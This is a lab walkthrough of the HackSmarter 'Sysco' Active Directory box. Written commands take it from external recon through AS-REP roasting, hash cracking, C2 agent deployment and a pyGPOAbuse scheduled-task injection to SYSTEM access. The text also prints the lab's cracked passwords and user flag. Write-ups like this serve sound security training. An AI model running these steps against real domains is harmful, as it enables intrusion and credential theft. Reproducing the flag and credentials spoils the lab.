Sysco
This box is provided by HackSmarter https://www.hacksmarter.org/
Scenario
Sysco is a Managed Service Provider that has tasked you to perform an external penetration testing on their active directory domain. You must obtain initial foothold, move laterally and escalate privileges while evading Antivirus detection to obtain administrator privileges.
Objectives and Scope
The core objective of this external penetration test is to simulate a realistic, determined adversary to achieve Domain Administrator privileges within Sysco's Active Directory (AD) environment. Starting from an external position, we will focus on obtaining an initial foothold, performing lateral movement, and executing privilege escalation while successfully evading Antivirus (AV) and other security controls. This is a red-team exercise to find security weaknesses before a real attacker does.
Overview
Sysco is an Active Directory penetration testing lab simulating a Managed Service Provider environment. The engagement begins from a fully external position with no credentials and requires the tester to chain together multiple attack techniques to ultimately achieve Domain Administrator privileges.
The attack path follows a realistic adversary simulation:
- Recon - Port scanning reveals a domain controller. Web enumeration of a company website exposes employee names, which are converted into plausible AD usernames. Directory brute-forcing uncovers a Roundcube webmail instance.
- Initial Access - Kerbrute validates usernames against the DC. An AS-REP roastable account (
jack.dowland) is identified, the hash is cracked offline, and the credentials are confirmed valid against SMB and Roundcube. - Credential Discovery - Jack's Roundcube inbox contains a sent email to Lainey with a router config file attached. The Cisco MD5 hash inside the config is cracked, yielding the password for
lainey.moore. - Foothold - Lainey is a member of the Remote Desktop and Remote Management groups, allowing direct RDP access. A C2 agent is deployed to gain persistent, interactive access.
- Lateral Movement - Enumerating Lainey's machine reveals a PuTTY shortcut containing SSH credentials for
netadmin. Netadmin's credentials are sprayed against the domain, providing lateral movement to a higher-privileged account. - Privilege Escalation - Greg is a member of
Group Policy Creator Owners. This group membership is abused usingpyGPOAbuseto inject a malicious scheduled task into an existing GPO, which executes a C2 payload asSYSTEMwhen a Group Policy update is forced.
Key Techniques: AS-REP Roasting, password cracking (Hashcat), directory brute-forcing (ffuf), username enumeration (Kerbrute), Bloodhound AD enumeration, Roundcube webmail access, Cisco config hash cracking, C2 deployment (Adaptix), GPO abuse (pyGPOAbuse), DPAPI enumeration (Seatbelt).
Recon
Port Scanning
The engagement starts with a standard Nmap scan against the target IP to identify open ports and running services. Two scans are run in parallel: a default script/version scan for common ports and a full port scan (-p-) to catch anything non-standard.
sudo nmap -sC -sV -vv -oA tcp 10.1.188.153 && sudo nmap -sC -sV -vv -p- -oA allports 10.1.188.153The results are consistent with a Windows Domain Controller. Key indicators include open ports for Kerberos (88), LDAP (389/3268), SMB (445), and DNS (53), which together strongly suggest this is DC01. This narrows our focus - exploiting or enumerating AD-specific protocols will be the primary path forward.
SMB Enumeration
With a potential DC identified, we attempt to enumerate SMB shares using a null/guest session. This sometimes exposes file shares without requiring credentials.
The DC correctly rejects unauthenticated SMB enumeration, returning an access denied error. No anonymous shares are available, so we need valid credentials before we can proceed down this path.
Web Enumeration - Employee Names
The target is also hosting a website. Browsing it manually reveals a staff or team page listing real employee names. This is a common OSINT/recon finding - company websites frequently expose the very information needed to construct valid Active Directory usernames.
The names found are:
- Greg Shields
- Sarah Johnson
- Jack Dowland
- Lainey Moore
Username Generation
Raw names aren't directly usable against AD - we need to generate all plausible username formats the organization might use (e.g., firstname.lastname, flastname, firstnamel, etc.). We use namemash https://github.com/krlsio/python/blob/main/namemash.py to produce a comprehensive wordlist from the discovered names.
/opt/namemash/namemash.py users_website > generated_usersThis produces a full list of username permutations for all four employees:
gregshields
shieldsgreg
greg.shields
shields.greg
shieldsg
gshields
sgreg
g.shields
s.greg
greg
shields
sarahjhonson
jhonsonsarah
sarah.jhonson
jhonson.sarah
jhonsons
sjhonson
jsarah
s.jhonson
j.sarah
sarah
jhonson
jackdowland
dowlandjack
jack.dowland
dowland.jack
dowlandj
jdowland
djack
j.dowland
d.jack
jack
dowland
laineymoore
moorelainey
lainey.moore
moore.lainey
moorel
lmoore
mlainey
l.moore
m.lainey
lainey
mooreContact Form - PHP Error
While browsing the website, submitting the contact form throws a visible PHP error. This reveals backend implementation details (e.g., the PHP version, file paths, or mail handler configuration) and confirms the site is not hardened. This kind of information disclosure is a low-severity finding in its own right.
Directory Brute-Forcing - Roundcube
We brute-force the web server's directory structure to discover hidden or unlisted paths. The initial DirBuster wordlist doesn't yield anything useful.
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-big.txt -u http://10.1.188.153/FUZZ -ic -e .phpSwitching to the larger raft wordlist reveals a /roundcube path - a Roundcube webmail installation. This is significant: webmail often acts as a direct window into internal communications and may contain sensitive information like credentials, config files, or internal documentation.
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -u http://10.1.188.153/FUZZ -ic -e .phpSMB Password Spray - No Bruteforce
With a generated username list in hand, we attempt to validate credentials against SMB. The --no-bruteforce flag pairs each username with the matching password (index-for-index) rather than spraying every password against every user, reducing lockout risk. This pass yields no valid hits.
nxc smb sysco.local -u generated_users -p generated_users --no-bruteforceKerbrute - Username Validation
Even without passwords, Kerberos can tell us which usernames are valid. When a username exists in AD, the DC responds differently to an AS-REQ than it does for a non-existent user. Kerbrute exploits this to enumerate valid accounts without triggering traditional account lockouts.
kerbrute userenum --dc sysco.local -d sysco.local generated_usersKerbrute confirms several valid usernames against the domain. This narrows our wordlist significantly for targeted attacks.
AS-REP Roasting
Some AD accounts are configured with the DONT_REQUIRE_PREAUTH flag, meaning Kerberos will return an encrypted AS-REP ticket without requiring the client to prove knowledge of the password first. This ticket can be captured and cracked offline - a technique called AS-REP Roasting.
We use NetExec to check for and harvest any roastable hashes:
nxc ldap sysco.local -u users -p '' --asreproast asrep_hashesjack.dowland is AS-REP roastable, and we capture his encrypted ticket hash.
Cracking the AS-REP Hash
The captured hash is cracked offline using Hashcat with the mode 18200 (Kerberos 5 AS-REP etype 23) against the rockyou wordlist.
hashcat -m 18200 -a 0 asrep_hashes /mnt/hgfs/I/data/rockyou.txt[email protected]:d7499800e4201b8789420938894a580c$c1555e49bf0ae554f51611edba311b72c52c26d2f63b55dabbd40f7c24e331f55cf8c2a8dec3f253b7a223864ee1a6536b3b07aa3d6bb230b1985f5f4b6eb35eb8080ef34440142dc4643ba154f7cf4fbb20614f5709e67e4cb7ab38e26ea04961625a6d733b1045fce327fac3fb5f4fe6a93ef36e5c3755cafc678e9c45fbf93a31b867ed7b0495f9c077ccbb3f79fd2f814c219fe085fa4d4ccacdcd582ee5e768996aa3d6a9df4c607daeb5b19ee7901d1f6de733e030ff5f52d7e094950e00ca333d38fbcde0602923df14078764b34f50481a2340af77abd6cb3b6b5fa76ca83c752c108f9837a9:musicman1The password cracks to musicman1. We now have valid domain credentials: jack.dowland:musicman1.
Confirming Access - SMB Spider and Roundcube
With valid credentials, we re-test SMB access and use the spider_plus module to enumerate all accessible file shares and their contents. This is a passive way to map what data Jack can reach across the network.
nxc smb sysco.local -u jack.dowland -p musicman1 -M spider_plusWe also test the credentials against Roundcube webmail, and they work - giving us access to Jack's email inbox.
Roundcube - Sent Email with Router Config
Browsing Jack's mailbox, we check the Sent folder and find an email Jack sent to Lainey containing an attached file: router2.cfg - a Cisco router configuration file.
Inside the config file, there is a Cisco-formatted password hash (using the enable secret or username secret syntax). The origin or intended use of this secret string is not immediately clear, but it's worth keeping for later.
Bloodhound - AD Enumeration
Bloodhound maps Active Directory relationships and attack paths by ingesting data collected by bloodhound-python. This helps identify privilege escalation routes, group memberships, ACL abuses, and delegation misconfigurations that aren't obvious from manual enumeration.
bloodhound-python -c all -u jack.dowland -p musicman1 -k -d sysco.local -dc dc01.sysco.local --dns-tcp -ns 10.1.188.153At this point, Bloodhound doesn't reveal a direct path to DA from Jack's account. However, the data confirms that Greg Shields is a sysadmin, and that Lainey Moore has both RDP and Remote Management (WinRM) access to at least one machine. These become important targets.
Cracking the Cisco Router Hash
With no direct Bloodhound path, we return to the router2.cfg file. The Cisco-formatted secret is identified as a Cisco MD5 hash (type 5, using the $1$ prefix format). These are crackable with Hashcat using mode 500.
hashcat -m 500 -a 0 cisco_hash /mnt/hgfs/I/data/rockyou.txtThe hash cracks to Chocolate1.
We spray this password against the domain using NetExec and confirm it belongs to lainey.moore.
Foothold
RDP as Lainey Moore
Since Lainey is a member of both the Remote Desktop Users and Remote Management Users groups (confirmed via Bloodhound), we can log into her workstation directly over RDP using Remmina.
This gives us an interactive desktop session as lainey.moore. We retrieve the user flag from her desktop or user profile:
5efd12c8bc80b6882fa86f5698b14dc6System Information
With an interactive session, we check the machine's system information to understand the OS version, architecture, patch level, and domain membership. This informs which privilege escalation techniques may be applicable.
C2 Agent Deployment
To maintain persistent, flexible access beyond the RDP session, we generate an Adaptix C2 agent, transfer it to the machine, and execute it as Lainey. Adaptix is a C2 framework that provides an interactive implant with post-exploitation capabilities.
The agent checks in, giving us a beacon as lainey.moore in the Adaptix console.
Lateral Movement
Enumerating Lainey's Machine
With an active C2 agent, we enumerate Lainey's user profile, desktop, documents, and application data for any sensitive material. Particular attention is paid to browser-saved credentials, application config files, and shortcut (.lnk) files, which sometimes store connection details inline.
PuTTY Shortcut - SSH Credentials for Greg
Enumeration reveals a PuTTY shortcut file: Putty - HS Router login.lnk. Inspecting this shortcut exposes the SSH username and password that Lainey (or whoever configured this) used to connect to a router - and those credentials belong to greg.shields.
Password Validation for Greg Shields
SSH (port 22) isn't open on the DC, so we can't use the credentials there directly. Instead, we spray Greg's newly discovered password across common protocols using NetExec to see where it's valid within the domain.
RDP as Greg Shields + New C2 Agent
The credentials work, and since Greg also has RDP access, we connect to the machine as Greg. A new Adaptix C2 agent is deployed and executed under Greg's context, giving us a second beacon - this time as a more privileged user.
Privilege Escalation
Seatbelt Enumeration
Seatbelt is a C# post-exploitation enumeration tool that checks dozens of security-relevant settings, configurations, and artefacts on a Windows host. We run it through the Adaptix agent to survey the machine's attack surface from Greg's perspective.
DPAPI Keys
Seatbelt identifies DPAPI (Data Protection API) master keys on the machine. DPAPI is used by Windows to encrypt secrets like saved browser credentials, WiFi passwords, and certificate private keys. While nothing immediately actionable is found here, the keys are noted for potential offline decryption if a higher-privileged context is obtained.
GPO Abuse - Group Policy Creator Owners
The pivotal finding: Greg is a member of the Group Policy Creator Owners group. This group grants members the ability to create and modify Group Policy Objects (GPOs) in the domain. By injecting a malicious scheduled task into an existing GPO - specifically the Default Domain Policy (31B2F340-016D-11D2-945F-00C04FB984F9) - we can force code execution as SYSTEM on any machine that applies the policy.
We use pyGPOAbuse to add a scheduled task to the GPO that executes our pre-staged C2 agent binary (ag.exe) from C:\Windows\Tasks\:
python3 pygpoabuse.py sysco.local/greg.shields:'5y5coSmarter2025!!!' -gpo-id 31B2F340-016D-11D2-945F-00C04FB984F9 -command 'C:\\Windows\\Tasks\\ag.exe'Forcing a Group Policy Update
GPOs are normally applied on a schedule (every ~90 minutes). To trigger the payload immediately, we force a Group Policy refresh from our RDP session on the target machine using gpupdate /force.
SYSTEM Beacon
The forced GPUpdate causes the DC to apply the modified GPO, which schedules and immediately runs ag.exe as SYSTEM. Within seconds, a new beacon appears in the Adaptix console with NT AUTHORITY\SYSTEM privileges - Domain Administrator level access has been achieved.